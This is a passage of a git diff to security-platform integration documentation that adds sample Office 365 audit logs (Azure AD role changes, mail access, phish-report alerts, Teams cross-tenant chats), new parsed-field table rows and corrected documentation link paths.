"{\"CreationTime\":\"2022-10-14T13:48:03\",\"Id\":\"4af0b443-42dd-4dc6-9bd1-751a55441000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"785d81fb-82aa-4ff3-9cbc-e3280761f36a\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"20.250.8.183\",\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"UserId\":\"user@mycompany.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\":[{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"SAS:EndAuth\"}],\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"785d81fb-82aa-4ff3-9cbc-e3280761f36a\",\"Type\":0},{\"ID\":\"user@mycompany.com\",\"Type\":5}],\"ActorContextId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"ActorIpAddress\":\"20.250.8.183\",\"InterSystemsId\":\"d48e6ea0-40c1-5000-5eba-0ee33d13b1ca\",\"IntraSystemId\":\"4af0b443-42dd-4dc6-9bd1-751a55441000\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"DeviceProperties\":[{\"Name\":\"OS\",\"Value\":\"Windows 10\"},{\"Name\":\"BrowserType\",\"Value\":\"Firefox\"},{\"Name\":\"IsCompliantAndManaged\",\"Value\":\"False\"},{\"Name\":\"SessionId\",\"Value\":\"b3a9b2b4-57c9-406b-9a2d-106b7f612248\"}],\"ErrorNumber\":\"500121\",\"LogonError\":\"AuthenticationFailedSasError\"}", + "message": "{\"CreationTime\": \"2022-10-14T13:48:03\", \"Id\": \"4af0b443-42dd-4dc6-9bd1-751a55441000\", \"Operation\": \"UserLoginFailed\", \"OrganizationId\": \"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\", \"RecordType\": 15, \"ResultStatus\": \"Success\", \"UserKey\": \"785d81fb-82aa-4ff3-9cbc-e3280761f36a\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ClientIP\": \"20.250.8.183\", \"ObjectId\": \"00000003-0000-0ff1-ce00-000000000000\", \"UserId\": \"user@mycompany.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"ResultStatusDetail\", \"Value\": \"Success\"}, {\"Name\": \"UserAgent\", \"Value\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\"}, {\"Name\": \"UserAuthenticationMethod\", \"Value\": \"1\"}, {\"Name\": \"RequestType\", \"Value\": \"SAS:EndAuth\"}], \"ModifiedProperties\": [], \"Actor\": [{\"ID\": \"785d81fb-82aa-4ff3-9cbc-e3280761f36a\", \"Type\": 0}, {\"ID\": \"user@mycompany.com\", \"Type\": 5}], \"ActorContextId\": \"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\", \"ActorIpAddress\": \"20.250.8.183\", \"InterSystemsId\": \"d48e6ea0-40c1-5000-5eba-0ee33d13b1ca\", \"IntraSystemId\": \"4af0b443-42dd-4dc6-9bd1-751a55441000\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"00000003-0000-0ff1-ce00-000000000000\", \"Type\": 0}], \"TargetContextId\": \"aa09a079-7796-46a8-a4d4-4d21b0dcf1b2\", \"ApplicationId\": \"00000003-0000-0ff1-ce00-000000000000\", \"DeviceProperties\": [{\"Name\": \"OS\", \"Value\": \"Windows 10\"}, {\"Name\": \"BrowserType\", \"Value\": \"Firefox\"}, {\"Name\": \"IsCompliantAndManaged\", \"Value\": \"False\"}, {\"Name\": \"SessionId\", \"Value\": \"b3a9b2b4-57c9-406b-9a2d-106b7f612248\"}], \"ErrorNumber\": \"500121\", \"LogonError\": \"AuthenticationFailedSasError\"}", "event": { "action": "UserLoginFailed", "category": [ @@ -3203,6 +3849,7 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.alert.description` | `keyword` | | |`office365.alert.display_name` | `keyword` | | |`office365.alert.entity_type` | `keyword` | | +|`office365.alert.id` | `keyword` | | |`office365.alert.severity` | `keyword` | | |`office365.alert.source` | `keyword` | | |`office365.alert.status` | `keyword` | | @@ -3220,6 +3867,7 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.context.client.id` | `keyword` | The identifier of Azure Active Directory application | |`office365.context.client.name` | `keyword` | The name of Azure Active Directory application | |`office365.context.correlation.id` | `keyword` | The identifier to correlate user's action across Microsoft 365 services | +|`office365.context.modified_properties` | `array` | | |`office365.defender.additional_actions` | `array` | The additional actions taken on the email | |`office365.defender.auth_details` | `array` | The authentication checks that are done for the email | |`office365.defender.connectors` | `keyword` | Identifiers of connectors associated with the email | @@ -3244,7 +3892,6 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.exchange.email.paths` | `array` | | |`office365.exchange.email.subjects` | `array` | A list of email subjects | |`office365.exchange.mailbox_guid` | `keyword` | | -|`office365.exchange.modified_properties` | `array` | | |`office365.exchange_admin.parameters` | `array` | The parameters that were used with the cmdlet that is identified in the event.action field | |`office365.form_name` | `keyword` | | |`office365.investigation.alert.category` | `keyword` | Investigation alert category | @@ -3274,6 +3921,7 @@ The following table lists the fields that are extracted, normalized under the EC |`office365.teams.channel.name` | `keyword` | The name of the channel | |`office365.teams.channel.type` | `keyword` | The type of the channel | |`office365.teams.communication.type` | `keyword` | The type of communication | +|`office365.teams.has_foreign_tenant_users` | `boolean` | | |`office365.teams.invitee` | `keyword` | The identifier of an invitee | |`office365.teams.message.id` | `keyword` | The identifier of the message | |`office365.teams.message.size` | `long` | The size of the message in bytes with UTF-16 encoding | @@ -3296,6 +3944,7 @@ The following table lists the fields that are extracted, normalized under the EC |`source.user.email` | `keyword` | User email address. | |`url.full` | `wildcard` | Full unparsed URL. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.email` | `keyword` | User email address. | |`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | diff --git a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md index ff9a4d0437..5b261dcb81 100644 --- a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md +++ b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99_sample.md @@ -159,6 +159,110 @@ In this section, you will find examples of raw logs as generated natively by the +=== "add_member_to_role" + + + ```json + { + "CreationTime": "2024-07-10T14:25:49", + "Id": "b4f48141-a2fe-4d47-9f0d-f09f26307035", + "Operation": "Add member to role.", + "OrganizationId": "f35698e3-5049-4b7f-b26b-9e9784705086", + "RecordType": 8, + "ResultStatus": "Success", + "UserKey": "key@example.com", + "UserType": 0, + "Version": 1, + "Workload": "AzureActiveDirectory", + "ObjectId": "john.doe@example.com", + "UserId": "admin@example.com", + "AzureActiveDirectoryEventType": 1, + "ExtendedProperties": [ + { + "Name": "additionalDetails", + "Value": "{}" + }, + { + "Name": "extendedAuditEventCategory", + "Value": "Role" + } + ], + "ModifiedProperties": [ + { + "Name": "Role.ObjectID", + "NewValue": "54fc7176-29ef-4b41-808f-3cdeb8010649", + "OldValue": "" + }, + { + "Name": "Role.DisplayName", + "NewValue": "Global Administrator", + "OldValue": "" + }, + { + "Name": "Role.TemplateId", + "NewValue": "ad1cbca4-efcc-4149-b4a2-aeb40412fe48", + "OldValue": "" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "TenantAdmins", + "OldValue": "" + } + ], + "Actor": [ + { + "ID": "admin@example.com", + "Type": 5 + }, + { + "ID": "100320029D963D0D", + "Type": 3 + }, + { + "ID": "User_576409b5-84f3-4791-8e3c-c9677e3bd898", + "Type": 2 + }, + { + "ID": "576409b5-84f3-4791-8e3c-c9677e3bd898", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "ActorContextId": "f35698e3-5049-4b7f-b26b-9e9784705086", + "InterSystemsId": "5a0910e4-c125-4b46-9616-0232d14915dc", + "IntraSystemId": "fb6cd132-f8e8-4ec5-9a0b-4ec8397e1405", + "SupportTicketId": "", + "Target": [ + { + "ID": "User_46522b15-1bf5-4bed-8a6c-4edc58c05b23", + "Type": 2 + }, + { + "ID": "46522b15-1bf5-4bed-8a6c-4edc58c05b23", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "john.doe@example.com", + "Type": 5 + }, + { + "ID": "100320029D9D1C86", + "Type": 3 + } + ], + "TargetContextId": "f35698e3-5049-4b7f-b26b-9e9784705086" + } + ``` + + + === "automated_investigation_and_response" @@ -307,6 +411,71 @@ In this section, you will find examples of raw logs as generated natively by the +=== "clientipadress" + + + ```json + { + "CreationTime": "2024-06-26T06:29:14", + "Id": "xxxx-xxx-xxx-xxxx", + "Operation": "MailItemsAccessed", + "OrganizationId": "xxxx-xxx-xxx-xxxx", + "RecordType": 50, + "ResultStatus": "Succeeded", + "UserKey": "xxxx-xxx-xxx-xxxx", + "UserType": 5, + "Version": 1, + "Workload": "Exchange", + "UserId": "user@mail.fr", + "AppId": "xxxx-xxx-xxx-xxxx", + "ClientAppId": "clientappidxxxx-xxx-xxx-xxxx", + "ClientIPAddress": "1000:1000:100:007::1", + "ClientInfoString": "Client=Exemple1;Client=Exemple2;;", + "ExternalAccess": "False", + "InternalLogonType": 0, + "LogonType": 0, + "LogonUserSid": "S-1-5-21-xxxx-xxx-xxx-xxxx", + "MailboxGuid": "xxxx-xxx-xxx-xxxx", + "MailboxOwnerSid": "S-1-5-21-xxxx-xxx-xxx-xxxx", + "MailboxOwnerUPN": "user@mail.fr", + "OperationProperties": [ + { + "Name": "MailAccessType", + "Value": "Bind" + }, + { + "Name": "IsThrottled", + "Value": "False" + } + ], + "OrganizationName": "organization.microsoft.com", + "OriginatingServer": "server (0.0.0000.000)\r\n", + "Folders": [ + { + "FolderItems": [ + { + "ClientRequestId": "xxxx-xxx-xxx-xxxx", + "Id": "aaaaaaaaaaaaa", + "InternetMessageId": "xxxxx@exemple.com", + "SizeInBytes": 127625 + }, + { + "ClientRequestId": "xxxx-xxx-xxx-xxxx", + "Id": "aaaaaaaaaaaaaaaaaa", + "InternetMessageId": "xxxx-xxx-xxx-xxxx@enterprise.net", + "SizeInBytes": 147360 + } + ], + "Id": "aaaaaaaaaaaaaaaaaaaa", + "Path": "Boite de reception" + } + ], + "OperationCount": 2 + } + ``` + + + === "compliancemanager-scorechange" @@ -339,6 +508,39 @@ In this section, you will find examples of raw logs as generated natively by the +=== "email_reported" + + + ```json + { + "CreationTime": "2024-05-24T06:29:22", + "Id": "03604c8d-ed69-466b-a9f4-80467c958739", + "Operation": "AlertUpdated", + "OrganizationId": "4f962933-707f-4441-8d56-bb178a2ed0b9", + "RecordType": 40, + "ResultStatus": "Succeeded", + "UserKey": "SecurityComplianceAlerts", + "UserType": 4, + "Version": 1, + "Workload": "SecurityComplianceCenter", + "ObjectId": "f54a9b97-a432-471b-a84a-ddcba13f5f35", + "UserId": "SecurityComplianceAlerts", + "AlertId": "2c7f6c46-33d7-4101-b2fc-0af27eaf308a", + "AlertLinks": [], + "AlertType": "System", + "Category": "ThreatManagement", + "Comments": "New alert", + "Data": "{\"f3u\":\"john.doe@example.com\",\"ts\":\"2024-05-24T05:44:00Z\",\"te\":\"2024-05-24T05:45:00Z\",\"op\":\"UserSubmission\",\"wl\":\"SecurityComplianceCenter\",\"tid\":\"8a1a1157-0272-492d-ab10-3f9853ac8183\",\"tdc\":\"1\",\"reid\":\"a04c1571-7271-445e-82e3-c39f848aceb8\",\"wsrt\":\"2024-05-24T05:45:22\",\"mdt\":\"Audit\",\"rid\":\"9a36861c-cc4d-4818-be4a-a20555480a00\",\"cid\":\"2b6fda52-8386-4213-b6fb-2fcb078571c4\",\"ad\":\"This alert is triggered when any email message is reported as malware or phish by users -V1.0.0.3\",\"lon\":\"UserSubmission\",\"an\":\"Email reported by user as malware or phish\",\"sev\":\"Low\",\"ail\":\"https://security.microsoft.com/mtp-investigation/urn:SubmissionInvestigation:260a29b9cf8a4358857b82aa9f086c48\"}", + "Name": "Email reported by user as malware or phish", + "PolicyId": "5b31bd58-7d6e-4f97-aa6b-5135fb1b1e52", + "Severity": "Low", + "Source": "Office 365 Security & Compliance", + "Status": "Resolved" + } + ``` + + + === "exchange_event1" @@ -1230,6 +1432,110 @@ In this section, you will find examples of raw logs as generated natively by the +=== "remove_member_from_role" + + + ```json + { + "CreationTime": "2024-07-10T14:31:24", + "Id": "d1253377-388e-4ca1-a163-32dccb867ddd", + "Operation": "Remove member from role.", + "OrganizationId": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55", + "RecordType": 8, + "ResultStatus": "Success", + "UserKey": "key@example.com", + "UserType": 0, + "Version": 1, + "Workload": "AzureActiveDirectory", + "ObjectId": "john.doe@example.com", + "UserId": "admin@example.com", + "AzureActiveDirectoryEventType": 1, + "ExtendedProperties": [ + { + "Name": "additionalDetails", + "Value": "{}" + }, + { + "Name": "extendedAuditEventCategory", + "Value": "Role" + } + ], + "ModifiedProperties": [ + { + "Name": "Role.ObjectID", + "NewValue": "", + "OldValue": "62d603c4-9712-4ea9-83c6-1e253fad40a4" + }, + { + "Name": "Role.DisplayName", + "NewValue": "", + "OldValue": "Global Administrator" + }, + { + "Name": "Role.TemplateId", + "NewValue": "", + "OldValue": "2eb5763a-6258-4084-90d6-8f149a03132d" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "", + "OldValue": "TenantAdmins" + } + ], + "Actor": [ + { + "ID": "admin@example.com", + "Type": 5 + }, + { + "ID": "100320029D963D0D", + "Type": 3 + }, + { + "ID": "User_47498f0f-242d-4ec8-8c13-9c861ce5669f", + "Type": 2 + }, + { + "ID": "47498f0f-242d-4ec8-8c13-9c861ce5669f", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + } + ], + "ActorContextId": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55", + "InterSystemsId": "3da056e9-e6dc-4157-b991-8304c3b95eb7", + "IntraSystemId": "e7bf6e46-a61f-417a-a11d-282756b8262f", + "SupportTicketId": "", + "Target": [ + { + "ID": "User_1514c9ec-882d-4beb-99a9-301209f6a05a", + "Type": 2 + }, + { + "ID": "1514c9ec-882d-4beb-99a9-301209f6a05a", + "Type": 2 + }, + { + "ID": "User", + "Type": 2 + }, + { + "ID": "john.doe@example.com", + "Type": 5 + }, + { + "ID": "100320029D9D1C86", + "Type": 3 + } + ], + "TargetContextId": "a6f8d8c5-e3ee-471b-a1e4-abdf3ccd6c55" + } + ``` + + + === "security_compliance_alert" @@ -1384,6 +1690,41 @@ In this section, you will find examples of raw logs as generated natively by the +=== "security_compliance_alert_5" + + + ```json + { + "CreationTime": "2024-04-16T08:01:42", + "Id": "d7cab54f-77b1-4ad5-8f2d-b4bba61e4e93", + "Operation": "AlertEntityGenerated", + "OrganizationId": "e0ff0845-9d15-4399-86ae-15081e39a16a", + "RecordType": 40, + "ResultStatus": "Succeeded", + "UserKey": "SecurityComplianceAlerts", + "UserType": 4, + "Version": 1, + "Workload": "SecurityComplianceCenter", + "ObjectId": "jdoe@example.org", + "UserId": "SecurityComplianceAlerts", + "AlertEntityId": "jdoe@example.org", + "AlertId": "a3ce0859-c92c-4f57-b50b-a63dad75ec4a", + "AlertLinks": [], + "AlertType": "System", + "Category": "ThreatManagement", + "Comments": "New alert", + "Data": "", + "EntityType": "User", + "Name": "Email reported by user as malware or phish", + "PolicyId": "88d533c5-bad6-4cfb-9245-1776726b55d7", + "Severity": "Low", + "Source": "Office 365 Security & Compliance", + "Status": "Investigating" + } + ``` + + + === "source_log" @@ -1501,6 +1842,361 @@ In this section, you will find examples of raw logs as generated natively by the +=== "teams_with_foreign_tenant_users" + + + ```json + { + "AppAccessContext": { + "IssuedAtTime": "2024-06-10T06:51:28", + "UniqueTokenId": "mYyWp_-UrEa4Z_pZM7FlAA" + }, + "CreationTime": "2024-06-10T11:50:24", + "Id": "4e3612b5-9cf5-4c6d-8213-2ba12af15334", + "Operation": "ChatCreated", + "OrganizationId": "a84a7a26-d1f0-4d45-a875-481355e2d96c", + "RecordType": 25, + "UserKey": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "dc73:8fb1:6e9:c37a:334b:8bb7:313a:766b", + "UserId": "c5a134b1-6eb3-4558-95e5-7f3f04219cf2", + "ChatThreadId": "19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Paris" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "10" + }, + { + "Key": "Country", + "Value": "fr" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "27/1.0.0.2024052206" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "6d869a66-371f-4b76-a1f6-3c115469a99d", + "DisplayName": "John Doe", + "UPN": "john.doe@example.org" + }, + { + "OrganizationId": "6db03b45-27a2-4662-9121-fa5773a8e043", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example.com" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": true, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [ + "example.org", + "example.com" + ], + "ParticipatingSIPDomains": [ + { + "DomainName": "example.org", + "TenantId": "6d869a66-371f-4b76-a1f6-3c115469a99d" + }, + { + "DomainName": "example.com", + "TenantId": "6db03b45-27a2-4662-9121-fa5773a8e043" + } + ], + "ParticipatingTenantIds": [ + "6d869a66-371f-4b76-a1f6-3c115469a99d", + "6db03b45-27a2-4662-9121-fa5773a8e043" + ] + }, + "ResourceTenantId": "6db03b45-27a2-4662-9121-fa5773a8e043", + "ItemName": "19:2546ebff-72fd-4fda-b537-bc31bf5e1d4c_ba359007-06c1-497f-bc4a-41ea45df4cbd@unq.gbl.spaces" + } + ``` + + + +=== "teams_with_foreign_tenant_users_2" + + + ```json + { + "CreationTime": "2024-07-12T08:27:46", + "Id": "5964f7bd-8775-4dbe-84a8-37573510558c", + "Operation": "ChatCreated", + "OrganizationId": "456bd527-0a31-47c3-b369-0c04b30849ac", + "RecordType": 25, + "UserKey": "413e1939-c450-4d63-8226-b02a542e6a9a", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "1.2.3.4", + "UserId": "john.doe@example1.com", + "ChatThreadId": "19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Berlin" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "NT 10.0" + }, + { + "Key": "Country", + "Value": "de" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "49/24061318408" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "456bd527-0a31-47c3-b369-0c04b30849ac", + "DisplayName": "John Doe", + "UPN": "john.doe@example1.com" + }, + { + "OrganizationId": "f35fe983-e797-44ce-bd0b-cf4da93a8043", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example2.com" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": true, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [ + "example1.com", + "example2.com" + ], + "ParticipatingSIPDomains": [ + { + "DomainName": "example1.com", + "TenantId": "456bd527-0a31-47c3-b369-0c04b30849ac" + }, + { + "DomainName": "example2.com", + "TenantId": "f35fe983-e797-44ce-bd0b-cf4da93a8043" + } + ], + "ParticipatingTenantIds": [ + "f35fe983-e797-44ce-bd0b-cf4da93a8043", + "456bd527-0a31-47c3-b369-0c04b30849ac" + ] + }, + "ResourceTenantId": "456bd527-0a31-47c3-b369-0c04b30849ac", + "ItemName": "19:9ac303ea-1bf3-442c-a216-a517de868921_413e1939-c450-4d63-8226-b02a542e6a9a@unq.gbl.spaces" + } + ``` + + + +=== "teams_with_foreign_tenant_users_3" + + + ```json + { + "CreationTime": "2024-07-12T08:27:37", + "Id": "db1cd437-5417-4cd3-ae6b-19a980f9bcfc", + "Operation": "ChatCreated", + "OrganizationId": "41847cb3-0096-48f2-82d0-c4f1bf92e031", + "RecordType": 25, + "UserKey": "4daf1829-8823-454f-b4e0-1cd22342d5f3", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "1.2.3.4", + "UserId": "john.doe@example1.com", + "ChatThreadId": "19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Berlin" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "NT 10.0" + }, + { + "Key": "Country", + "Value": "de" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "49/24061318408" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "41847cb3-0096-48f2-82d0-c4f1bf92e031", + "DisplayName": "John Doe", + "UPN": "john.doe@example1.com" + }, + { + "OrganizationId": "1d36ca61-5509-4ac7-983d-91dfdeb5f492", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example2.com" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": true, + "HasGuestUsers": false, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [ + "example1.com", + "example2.com" + ], + "ParticipatingSIPDomains": [ + { + "DomainName": "example1.com", + "TenantId": "41847cb3-0096-48f2-82d0-c4f1bf92e031" + }, + { + "DomainName": "example2.com", + "TenantId": "1d36ca61-5509-4ac7-983d-91dfdeb5f492" + } + ], + "ParticipatingTenantIds": [ + "1d36ca61-5509-4ac7-983d-91dfdeb5f492", + "41847cb3-0096-48f2-82d0-c4f1bf92e031" + ] + }, + "ResourceTenantId": "41847cb3-0096-48f2-82d0-c4f1bf92e031", + "ItemName": "19:d473ae3c-906c-4a72-8b3f-18e6c9bfdcd7_4daf1829-8823-454f-b4e0-1cd22342d5f3@unq.gbl.spaces" + } + ``` + + + +=== "teams_without_foreign_tenant_users" + + + ```json + { + "CreationTime": "2024-06-10T12:14:57", + "Id": "f47118c3-edcf-43a9-b505-c7c904231ac2", + "Operation": "ChatCreated", + "OrganizationId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "RecordType": 25, + "UserKey": "70de41a7-73c7-4532-8257-25ec88456e99", + "UserType": 0, + "Version": 1, + "Workload": "MicrosoftTeams", + "ClientIP": "194.169.176.18", + "UserId": "jdoe_example.org#EXT#@example.onmicrosoft.com", + "ChatThreadId": "19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces", + "CommunicationType": "OneOnOne", + "ExtraProperties": [ + { + "Key": "TimeZone", + "Value": "Europe/Paris" + }, + { + "Key": "OsName", + "Value": "windows" + }, + { + "Key": "OsVersion", + "Value": "NT 10.0" + }, + { + "Key": "Country", + "Value": "fr" + }, + { + "Key": "ClientName", + "Value": "skypeteams" + }, + { + "Key": "ClientVersion", + "Value": "49/24051622207" + }, + { + "Key": "ClientUtcOffsetSeconds", + "Value": "7200" + } + ], + "Members": [ + { + "OrganizationId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "DisplayName": "John Doe", + "UPN": "jdoe_example.org#EXT#@example.onmicrosoft.com" + }, + { + "OrganizationId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "DisplayName": "Jane Doe", + "UPN": "jane.doe@example.org" + } + ], + "ParticipantInfo": { + "HasForeignTenantUsers": false, + "HasGuestUsers": true, + "HasOtherGuestUsers": false, + "HasUnauthenticatedUsers": false, + "ParticipatingDomains": [], + "ParticipatingSIPDomains": [], + "ParticipatingTenantIds": [ + "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1" + ] + }, + "ResourceTenantId": "e7dc5731-9cc4-4c17-8dbb-a695b9cd69f1", + "ItemName": "19:0f738a46-74e0-45cf-a5e7-ff31eb2d9cdb_e574a199-c965-4fe2-8c02-0a98a1e8f597@unq.gbl.spaces" + } + ``` + + + === "threat_intel" diff --git a/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md b/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md index 1eb631f2ac..259e992662 100644 --- a/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md +++ b/_shared_content/operations_center/integrations/generated/ccf942fe-c839-42be-a081-5c3f946e80f5.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "searchlight_alerts.json" diff --git a/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md b/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md index 02baed629e..9f8100d9fb 100644 --- a/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md +++ b/_shared_content/operations_center/integrations/generated/cf5c916e-fa26-11ed-a844-f7f4d7348199.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "allowed.json" diff --git a/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md b/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md index 4ea04662df..683b354e86 100644 --- a/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md +++ b/_shared_content/operations_center/integrations/generated/d0383e87-e054-4a21-8a2c-6a89635d8615.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_detection.json" @@ -67,7 +67,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "ubika": { "cloud_protector": { - "application_id": "www.some-app.com" + "application_id": "www.some-app.com", + "attack_family": "Information Disclosure" } }, "url": { @@ -98,6 +99,7 @@ The following table lists the fields that are extracted, normalized under the EC |`rule.id` | `keyword` | Rule ID | |`source.ip` | `ip` | IP address of the source. | |`ubika.cloud_protector.application_id` | `keyword` | Website server name | +|`ubika.cloud_protector.attack_family` | `keyword` | The nature of the attack | |`url.path` | `wildcard` | Path of the request, such as "/search". 